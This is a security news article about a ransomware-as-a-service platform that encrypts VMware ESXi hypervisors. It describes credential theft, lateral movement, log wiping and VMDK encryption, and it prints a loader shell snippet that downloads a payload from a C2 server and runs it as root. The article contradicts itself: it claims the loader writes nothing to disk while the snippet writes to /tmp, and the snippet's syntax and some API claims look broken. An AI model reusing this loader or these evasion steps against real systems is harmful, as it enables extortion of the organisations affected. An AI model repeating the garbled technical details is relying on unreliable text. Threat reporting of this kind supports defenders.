New ‘shinysp1d3r’ Ransomware-as-a-service in Active Development to Encrypt VMware ESXi Environments

Emerging in mid-2025, the shinysp1d3r ransomware-as-a-service (RaaS) platform represents the next evolution of cloud-focused extortion tools.

Unlike traditional ransomware that targets Windows endpoints or network file shares, shinysp1d3r is engineered specifically to infect and encrypt VMware ESXi hypervisors and their attached datastores.

Early deployments have demonstrated a two-stage payload delivery: initial access is gained through compromised SSO credentials or SSH keys, followed by a secondary module that spreads laterally across ESXi clusters.

Victims report that once deployed, the ransomware enumerates all running virtual machines, disables snapshot functionality, and begins simultaneous AES-256 encryption of each VMDK file.

The project’s control panel offers affiliates granular options to tailor the encryption process by selecting datastores, specifying file extensions to target, and configuring network throttling to evade detection.

Affiliates can monitor real-time progress and negotiate ransom terms using an integrated chat widget.

While still under active development, shinysp1d3r has already drawn interest from multiple underground forums due to its streamlined management interface and robust error-handling routines, which ensure that partial encryptions can resume automatically after service interruptions.

EclecticIQ analysts observed that shinysp1d3r is poised to leverage existing ShinyHunters infrastructure and affiliate networks to rapidly expand its victim base once matured.

Functionally, shinysp1d3r’s architecture consists of a lightweight loader and a full-featured encryption daemon.

The loader is a position-independent shell script that infects ESXi hosts via SSH or API calls, stages the daemon in memory, and triggers execution, all without writing files to disk.

The daemon then mounts each datastore with exclusive locks, suspends any running VMs to capture consistent snapshots in memory, and executes an embedded Go-based encryption binary.

This binary employs concurrent worker threads to maximize throughput and avoid triggering hypervisor performance alerts.

Infection Mechanism

Affiliates typically initiate infections by harvesting SSH keys from misconfigured management servers or by abusing stolen SSO tokens obtained through vishing attacks.

Once authenticated, the loader script is deployed using the ESXi host’s built-in busybox shell. It checks for required privileges, then fetches the main ransomware payload from a C2 server over HTTPS.

The following snippet illustrates the loader’s core logic:-

#!/ bin/ sh
# shinysp1d3r loader for ESXi
C2 = "https[:]//srv[.]affiliateshinysp1d3r[.]com/payload"
TMP = "/tmp/[.]shinyloader"
wget - qO "$TMP" "$C2" && "chmod" + x "$TMP"
# Execute in memory
$TMP --esxi-user root --esxi-pass "$ {ESXI_PASS}"

After execution, the loader cleans up logs to remove audit traces and disables syslog forwarding to external servers. The daemon then iterates through each datastore path under /vmfs/volumes, locks files using ESXi’s VOMA API, and applies encryption in place.

By leveraging the hypervisor’s local file locking, shinysp1d3r ensures that no virtual disks can be modified or rolled back, forcing victims to either restore from offline backups or pay the ransom.

Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.